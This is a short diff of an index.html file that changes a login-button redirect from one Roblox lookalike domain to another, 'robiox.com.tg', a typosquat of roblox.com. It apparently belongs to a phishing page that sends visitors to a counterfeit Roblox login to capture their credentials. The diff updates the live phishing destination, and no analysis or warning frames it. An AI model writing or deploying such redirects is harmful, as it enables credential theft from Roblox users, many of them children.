--- a/index.html
+++ b/index.html
@@ -147,7 +147,7 @@
       document.getElementById("loginModal").classList.remove("show");
     }
     function redirectToPage() {
-      window.location.href = "https://us-roblox.com/login?returnUrl=9955485842233784";
+      window.location.href = "https://www.robiox.com.tg/NewLogin?returnUrl=https%3A%2F%2Fwww.roblox.com%2Fusers%2F418536882031%2Fprofile";
     }
   </script>
 </body>
